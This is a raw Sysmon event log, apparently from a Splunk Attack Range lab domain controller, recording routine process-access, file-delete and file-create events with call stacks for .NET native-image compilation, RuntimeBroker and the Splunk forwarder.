21:06:47.432{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.369{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A961FB1D19BF2CE7E20B9002ED9D3071,SHA256=BCB94765EB890C3805C3B7779DA7799759A5ED81441517D1B197978CEC6C2E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.353{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C0BE70677C01B9F70F732EF40EED0F,SHA256=B6E08258F66E1449BCD9D6A4E275669EBB054F1FFA83584049B7F7A9096089FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.353{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC68F668E3263D0631AEE88A7B80DF96,SHA256=15606E7908F33A6CB490136D06CC7BBA1DC701923D4CCAA754E130A37CBFEA6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.338{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-A267-60D3-FE04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.307{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A267-60D3-FE04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.307{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A267-60D3-FE04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:47.228{4DB9351A-A266-60D3-FD04-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14ec-0\UIAutomationClient.dll2021-06-23 21:06:47.228 10341000x800000000000000022277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766184C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766184C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765744C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765252C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765744C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765252C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 